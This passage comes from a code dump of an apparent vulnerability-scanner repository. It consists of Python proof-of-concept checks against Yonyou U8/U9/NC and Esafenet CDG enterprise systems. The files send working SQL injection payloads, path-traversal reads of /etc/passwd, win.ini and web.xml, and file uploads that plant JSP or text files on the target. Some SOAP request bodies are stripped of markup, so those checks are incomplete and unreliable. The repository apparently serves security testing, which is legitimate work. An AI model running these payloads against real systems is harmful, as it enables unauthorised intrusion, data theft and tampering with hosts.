        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
        'Content-Type': 'text/plain; charset=UTF-8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }
    target = urllib.parse.urljoin(url, "/yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and 'qkqxq' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_login2.RegisterServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Content-based SQL injection probe for 用友U8 ``nc.bs.sm.login2.RegisterServlet``.

    One GET carries a UNION payload in ``usercode`` that surfaces the database
    version string; a 200 reply containing ``Microsoft`` is positive. Only two
    headers are sent (a loopback ``X-Forwarded-For`` and a fixed session
    cookie), so the User-Agent is whatever ``requests`` defaults to.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'X-Forwarded-For': '127.0.0.1',
        'Cookie': 'JSESSIONID=D523370AE42E1D2363160250C914E62A.server'
    }
    target = urllib.parse.urljoin(url, "/servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and 'Microsoft' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_runScript_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe 用友NCCloud ``runScript`` for SQL execution via the ``script`` field.

    POSTs a form body whose ``script`` selects ``111*111``; a 200 reply
    containing the product ``12321`` is taken as proof the statement ran.
    A fixed ``Authorization`` value is sent as given in the original check.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友NCCloud系统runScript存在SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',
        'Accept': '*/*',
        'Accept-Encoding': 'gzip',
        'Accept-Language': 'en',
        'Authorization': '58e00466213416018d01d15de83b0198',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    body = '''key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual'''
    # 111 * 111 -- the arithmetic result the reply is expected to echo.
    expected_product = '12321'
    target = urllib.parse.urljoin(url, "/ncchr/attendScript/internal/runScript")
    try:
        response = requests.post(target, headers=headers, data=body)
        hit = response.status_code == 200 and expected_product in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_upload_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
def verify(url):
    """Probe a ``/linux/pages/upload.jsp`` endpoint for unrestricted file upload.

    POSTs a one-line JSP body with the destination name supplied in a
    ``filename`` request header, then -- if the upload answered 200 with
    ``success`` -- tries to fetch the file back under ``/linux/``. The
    ``name`` field of the report is left empty in this check.

    Args:
        url: Base URL of the target. ``urljoin`` with an absolute path replaces
            any path already present in ``url``; the second request
            concatenates onto ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` is added
        only on a positive result.
    """
    report = {'name': '', 'vulnerable': False, 'url': url}
    num = generate_random_number(6)
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'filename': f'{num}.jsp',
        'Accept-Encoding': 'gzip'
    }
    body = '''<% out.println("The website has vulnerabilities!!");%>'''
    target = urllib.parse.urljoin(url, "/linux/pages/upload.jsp")
    try:
        upload = requests.post(target, headers=headers, data=body)
        if upload.status_code == 200 and 'success' in upload.text:
            # Kept verbatim from the original: ``num.jsp`` is an attribute
            # access on ``num``, so unless generate_random_number returns an
            # object with a ``jsp`` attribute this raises AttributeError and
            # the except below returns the default report.
            target = url + f'/linux/{num.jsp}'
            fetched = requests.get(target)
            if fetched.status_code == 200 and 'vulnerabilities' in fetched.text:
                report['vulnerable'] = True
                report['verify'] = target
        return report
    except BaseException:
        # Same scope as the original bare except: every failure, including
        # KeyboardInterrupt, is reported as "not vulnerable".
        return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_DoQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_DoQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_UMWebService_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_UMWebService_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/yongyou_u9_DoQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
# Probe for SQL injection in the 用友U9 ``DoQuery`` web service.
#
# POSTs a SOAP envelope to ``TransWebService.asmx`` and treats a 200 reply
# whose body contains ``Code`` as positive.
#
# Args:
#     url: Base URL of the target; the absolute endpoint path replaces any path
#         already present in ``url``.
#
# Returns:
#     ``relsult`` -- dict with ``name``, ``vulnerable`` and ``url``; ``verify``
#     holds the probed URL on a positive result.
5 | relsult = {
6 | 'name': '用友U9系统DoQuery接口存在SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
# NOTE(review): the SOAPAction names ``GetEnterprise`` although the check is
# titled DoQuery; the envelope that would show the actual operation is not
# recoverable here (see below).
10 | headers = {
11 | 'Content-Type': 'text/xml; charset=utf-8',
12 | 'SOAPAction': '"http://tempuri.org/GetEnterprise"'
13 | }
# NOTE(review): this literal appears to have lost its XML markup in extraction
# -- only blank lines remain -- so the request body as shown is not the one
# the original check sends. Treat the content as incomplete.
14 | data = '''
15 |
16 |
17 |
18 |
19 | '''
20 | vurl = urllib.parse.urljoin(url, "/U9C/CS/Office/TransWebService.asmx")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200 and 'Code' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
# Bare except: any failure (including KeyboardInterrupt) yields the default
# "not vulnerable" report.
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/yongyou_u9_UMWebService_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
# Probe for arbitrary file read in the 用友U9 ``UMWebService.asmx`` service.
#
# POSTs a SOAP envelope for the ``GetLogContent`` operation whose argument is a
# relative ``../web.config`` path and treats a 200 reply whose body contains
# ``config`` as positive.
#
# Args:
#     url: Base URL of the target; the absolute endpoint path replaces any path
#         already present in ``url``.
#
# Returns:
#     ``relsult`` -- dict with ``name``, ``vulnerable`` and ``url``; ``verify``
#     holds the probed URL on a positive result.
5 | relsult = {
6 | 'name': '用友U9-UMWebService.asmx存在文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Content-Type': 'text/xml; charset=utf-8',
14 | 'SOAPAction': '"http://tempuri.org/GetLogContent"',
15 | 'Accept-Encoding': 'gzip'
16 | }
# NOTE(review): this literal appears to have lost its XML markup in extraction
# -- only the element text survives -- so the body as shown is not what the
# original check sends. Treat the content as incomplete.
17 | data = '''
18 |
19 |
20 |
21 | ../web.config
22 |
23 |
24 | '''
25 | vurl = urllib.parse.urljoin(url, "/u9/OnLine/UMWebService.asmx")
26 | try:
27 | response = requests.post(vurl, headers=headers, data=data)
28 | if response.status_code == 200 and 'config' in response.text:
29 | relsult['vulnerable'] = True
30 | relsult['verify'] = vurl
31 | return relsult
32 |
33 | except:
# Bare except: any failure (including KeyboardInterrupt) yields the default
# "not vulnerable" report.
34 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_ELTextFile_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_ELTextFile_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_getFileLocal_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_getFileLocal_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadApk_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadApk_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_ELTextFile_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe 用友Ufida ``ELTextFile.load.d`` for arbitrary file read.

    POSTs (with no body) to the endpoint with ``src=WEB-INF/web.xml`` and
    treats a 200 reply whose body contains ``web-app`` -- the root element of
    a servlet descriptor -- as positive.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友Ufida-ELTextFile.load.d任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    target = urllib.parse.urljoin(url, "/hrss/ELTextFile.load.d?src=WEB-INF/web.xml")
    try:
        # POST without a body, as in the original.
        response = requests.post(target, headers=headers)
        hit = response.status_code == 200 and 'web-app' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_getFileLocal_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe the 用友 mobile management ``getFileLocal`` action for arbitrary file read.

    One GET asks ``/portal/file`` for a traversal ``fileid`` pointing at
    ``web.xml``; a 200 reply containing ``version=`` (the XML declaration) is
    positive. A fixed session cookie is sent as given in the original check.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友移动系统管理getFileLocal接口存在任意文件读取',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': 'JSESSIONID=B9F1AC8D34E9DFD16A3A7A4B9CEE4EF9.server',
        'Connection': 'close'
    }
    target = urllib.parse.urljoin(url, "/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and 'version=' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_uploadApk_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe the 用友 mobile management ``uploadApk`` action for unrestricted file upload.

    POSTs a hand-built multipart body (declared as form-urlencoded, as in the
    original) naming a fixed ``5921209.jsp``; if the reply is 200, the file is
    fetched back from ``/maupload/apk/`` and a 200 containing the fixed marker
    ``082863327`` is positive. Note that ``verify`` records the upload URL,
    not the fetch URL.

    Args:
        url: Base URL of the target. ``urljoin`` with an absolute path replaces
            any path already present in ``url``; the second request
            concatenates onto ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` is added
        only on a positive result.
    """
    report = {
        'name': '用友移动系统管理uploadApk接口存在任意文件上传',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    boundary = 'fa48ebfef59b133a8cd5275661b35d2c'
    # Newline-separated exactly as the original triple-quoted literal.
    body = '\n'.join([
        f'--{boundary}',
        'Content-Disposition: form-data; name="downloadpath"; filename="5921209.jsp"',
        'Content-Type: application/msword',
        '',
        '082863327',
        f'--{boundary}--',
    ])
    # Endpoint string kept verbatim from the original check.
    target = urllib.parse.urljoin(url, "/maportal/appmanager/uploadApk.dopk_obj=")
    try:
        upload = requests.post(target, headers=headers, data=body)
        if upload.status_code == 200:
            fetched = requests.get(url+'/maupload/apk/5921209.jsp')
            if fetched.status_code == 200 and '082863327' in fetched.text:
                report['vulnerable'] = True
                report['verify'] = target
        return report
    except BaseException:
        # Same scope as the original bare except: every failure, including
        # KeyboardInterrupt, is reported as "not vulnerable".
        return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/yongyou_government_affairs_FileDownload_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
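def verify(url):
    """Probe 用友政务财务系统 ``FileDownload`` for arbitrary file read.

    Two candidate paths are tried in order -- a Unix one and a Windows one --
    each via GET on the ``execlPath`` parameter. The first 200 reply whose
    body carries the expected marker (``root`` / ``[fonts]``) is reported and
    no further request is made.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        matching probe URL on a positive result. The original fell off the end
        of its ``try`` and returned ``None`` when neither probe matched; this
        version returns the dict in every case.
    """
    relsult = {
        'name': '用友政务财务系统FileDownload存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'Connection': 'keep-alive',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br, zstd',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }
    # (probe URL, marker expected in a successful read) -- tried in this order.
    probes = [
        (urllib.parse.urljoin(url, "/bg/attach/FileDownload?execlPath=/etc/passwd"), 'root'),
        (urllib.parse.urljoin(url, "/bg/attach/FileDownload?execlPath=C://Windows//win.ini"), '[fonts]'),
    ]
    try:
        for target, marker in probes:
            response = requests.get(target, headers=headers)
            if response.status_code == 200 and marker in response.text:
                relsult['vulnerable'] = True
                relsult['verify'] = target
                break
    except BaseException:
        # Same scope as the original bare except: any failure yields the
        # default "not vulnerable" report.
        pass
    return relsult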
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/yongyou_u9_PatchFile_fileupload.py:
--------------------------------------------------------------------------------
import urllib
import urllib.parse

import requests
3 |
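def verify(url, *, timeout=10):
    """Probe a Yonyou U9 host for the PatchFile.asmx unrestricted file upload.

    Intrusive check. It POSTs the PoC's SOAP body to ``/CS/Office/AutoUpdates/PatchFile.asmx``,
    which is expected to write ``69123.txt`` into that directory, then fetches the file back
    over HTTP. The uploaded file is not removed afterwards, so a positive result leaves an
    artifact on the target that is visible in web-server access logs and to file-integrity
    monitoring.

    Args:
        url: Base URL of the target. The read-back GET is built by plain string
            concatenation (as in the original), so pass it without a trailing slash.
        timeout: Per-request timeout in seconds. Without one an unresponsive host would
            block the scanner thread indefinitely.

    Returns:
        A result dict with ``name``, ``vulnerable`` and ``url``; on a hit it also carries
        ``verify`` (the URL the file was read back from). ``vulnerable`` stays ``False`` on a
        network error and when the upload or the read-back does not succeed — the original
        fell off the end of its ``try`` block and returned ``None`` in that last case.

    Raises:
        Anything that is not a ``requests.RequestException`` propagates; the original
        bare ``except:`` also swallowed ``KeyboardInterrupt``/``SystemExit``.
    """
    result = {
        'name': '用友-U9-PatchFile.asmx任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36',
        'Connection': 'close',
        'Content-Type': 'text/xml; charset=utf-8',
        # NOTE(review): requests recomputes Content-Length from the body it sends, so this
        # hard-coded value is presumably overwritten — confirm against the pinned requests version.
        'Content-Length': '421'
    }
    # NOTE(review): the SOAP envelope appears to have lost its XML markup in this listing —
    # only the text nodes survive (the base64 form of ``test123``, a ``./`` path and the file
    # name). Kept byte-for-byte; confirm against the repository source before relying on it.
    data = '''



dGVzdDEyMw==
./
69123.txt


'''
    vurl = urllib.parse.urljoin(url, "/CS/Office/AutoUpdates/PatchFile.asmx")
    # One string for both the read-back GET and the reported ``verify`` value.
    uploaded_url = url + '/CS/Office/AutoUpdates/69123.txt'
    try:
        upload = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if upload.status_code == 200:
            readback = requests.get(uploaded_url, timeout=timeout)
            # ``test123`` is the decoded form of the base64 token in the body above.
            if readback.status_code == 200 and 'test123' in readback.text:
                result['vulnerable'] = True
                result['verify'] = uploaded_url
                return result
    except requests.RequestException:
        # Network-level failure: report "not vulnerable" rather than crash the worker.
        return result
    # Upload or read-back did not succeed: still hand back a well-formed result instead of None.
    return result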
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_DecryptApplication_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_DecryptApplication_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_DecryptionApp_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_DecryptionApp_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_UploadFileManagerService_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_UploadFileManagerService_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_dataimport_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_dataimport_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_CDGAuthoriseTempletService1_sqli.py:
--------------------------------------------------------------------------------
import urllib
import urllib.parse

import requests
3 |
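def verify(url, *, timeout=10):
    """Probe an Esafenet CDG host for the CDGAuthoriseTempletService1 SQL injection (XVE-2024-19611).

    POSTs the PoC's opaque encoded body to ``/CDGServer3/CDGAuthoriseTempletService1`` and
    treats a 200 response containing both marker tokens as a hit. The body and the markers
    are reproduced exactly as shipped; their encoding is not documented here, so do not edit
    either of them.

    Args:
        url: Base URL of the target (scheme and host; a path is allowed and resolved by
            ``urljoin``).
        timeout: Per-request timeout in seconds. Without one an unresponsive host would
            block the scanner thread indefinitely.

    Returns:
        A result dict with ``name``, ``vulnerable`` and ``url``; on a hit it also carries
        ``verify`` (the probed URL). ``vulnerable`` stays ``False`` on a network error and
        when the markers are absent — the original fell off the end of its ``try`` block and
        returned ``None`` in that last case.

    Raises:
        Anything that is not a ``requests.RequestException`` propagates; the original
        bare ``except:`` also swallowed ``KeyboardInterrupt``/``SystemExit``.
    """
    result = {
        'name': '亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611)',
        'vulnerable': False,
        'url': url
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/xml"
    }
    data = "CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDJAFOOFLNONAODEHAOEOGNEODKCOMDHBCFNPABIFOJJMOAABAPPFOFKBJMFFECMPBEEABGMMHLFAMKELPIEKDIOLJBAEFJHFMGNCLFOHPGKMOALGNKIPEDBEANAIMMLHKFLFOMIAFFCNHGBBDOCBDIONABHPKGCFFFOGCFKGPFAEAFCFJGHFEFOGOCB"
    vurl = urllib.parse.urljoin(url, "/CDGServer3/CDGAuthoriseTempletService1")
    # Both tokens must be present; they are in the same opaque encoding as the body.
    markers = ('FEPCCC', 'MEOGCAKA')
    try:
        # NOTE(review): TLS certificate verification is disabled here but not in the sibling
        # Esafenet PoCs — keep that deliberate; it presumably also triggers urllib3's
        # InsecureRequestWarning unless silenced elsewhere.
        response = requests.post(vurl, headers=headers, data=data, verify=False, timeout=timeout)
        if response.status_code == 200 and all(m in response.text for m in markers):
            result['vulnerable'] = True
            result['verify'] = vurl
            return result
    except requests.RequestException:
        # Network-level failure: report "not vulnerable" rather than crash the worker.
        return result
    # Markers absent: still hand back a well-formed result instead of None.
    return result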
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_DecryptApplication_lfi.py:
--------------------------------------------------------------------------------
import urllib
import urllib.parse

import requests
3 |
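def verify(url, *, timeout=10):
    """Probe an Esafenet CDG host for the DecryptApplication arbitrary file read.

    Issues one read-only GET to the ``DecryptApplication`` endpoint (through the ``;login;``
    path segment the PoC uses) requesting ``C:///Windows/win.ini`` and treats ``[fonts]`` in
    a 200 response as a hit. Nothing is written on the target. The probe is Windows-specific:
    a deployment on another OS would not be detected by it.

    Args:
        url: Base URL of the target (scheme and host; a path is allowed and resolved by
            ``urljoin``).
        timeout: Per-request timeout in seconds. Without one an unresponsive host would
            block the scanner thread indefinitely.

    Returns:
        A result dict with ``name``, ``vulnerable`` and ``url``; on a hit it also carries
        ``verify`` (the probed URL). ``vulnerable`` stays ``False`` on a network error and
        when the marker is absent — the original fell off the end of its ``try`` block and
        returned ``None`` in that last case.

    Raises:
        Anything that is not a ``requests.RequestException`` propagates; the original
        bare ``except:`` also swallowed ``KeyboardInterrupt``/``SystemExit``.
    """
    result = {
        'name': '亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        # ``[fonts]`` is a section header of win.ini, so its presence means the file was served.
        if response.status_code == 200 and '[fonts]' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
            return result
    except requests.RequestException:
        # Network-level failure: report "not vulnerable" rather than crash the worker.
        return result
    # Marker absent: still hand back a well-formed result instead of None.
    return result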
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_UploadFileManagerService_lfi.py:
--------------------------------------------------------------------------------
import urllib
import urllib.parse

import requests
3 |
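def verify(url, *, timeout=10):
    """Probe an Esafenet CDG host for the UploadFileManagerService arbitrary file read.

    Issues one read-only POST to ``/CDGServer3/document/UploadFileManagerService;login`` with
    a form body requesting ``c:/windows/win.ini`` and treats ``[fonts]`` in a 200 response as
    a hit. Nothing is written on the target. The probe is Windows-specific: a deployment on
    another OS would not be detected by it.

    Args:
        url: Base URL of the target (scheme and host; a path is allowed and resolved by
            ``urljoin``).
        timeout: Per-request timeout in seconds. Without one an unresponsive host would
            block the scanner thread indefinitely.

    Returns:
        A result dict with ``name``, ``vulnerable`` and ``url``; on a hit it also carries
        ``verify`` (the probed URL). ``vulnerable`` stays ``False`` on a network error and
        when the marker is absent — the original fell off the end of its ``try`` block and
        returned ``None`` in that last case.

    Raises:
        Anything that is not a ``requests.RequestException`` propagates; the original
        bare ``except:`` also swallowed ``KeyboardInterrupt``/``SystemExit``.
    """
    result = {
        'name': '亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
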